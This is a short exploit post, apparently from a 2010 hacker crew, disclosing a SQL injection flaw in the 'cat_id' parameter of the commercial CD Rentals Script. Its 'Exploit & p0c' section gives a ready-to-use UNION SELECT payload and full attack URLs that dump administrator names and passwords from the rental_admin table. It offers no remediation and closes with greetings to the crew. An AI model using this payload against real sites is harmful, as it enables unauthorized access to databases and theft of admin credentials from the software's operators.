-----------------------------------------------------------------------
CD Rentals Script (cat_id) SQL injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : November, 20-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : CD Rentals Software
Price : $550
Vendor : http://www.commodityrentals.com/
Exploit & p0c
_____________
-9999+union+all+select+1,2,group_concat(admin_name,char(58),admin_password),4,5+from+rental_admin--
http://site/[path]/index.php?view=catalog&item_type=M&cat_id=[SQLi]
http://site/[path]/index.php?view=catalog&item_type=M&cat_id=-9999+union+all+select+1,2,group_concat(admin_name,char(58),admin_password),4,5+from+rental_admin--
ShoutZ
______
All YOGYACARDERLINK CREW, GheMaX, LeQhi, IdioT_InsidE
Also Jovita & Fabian :)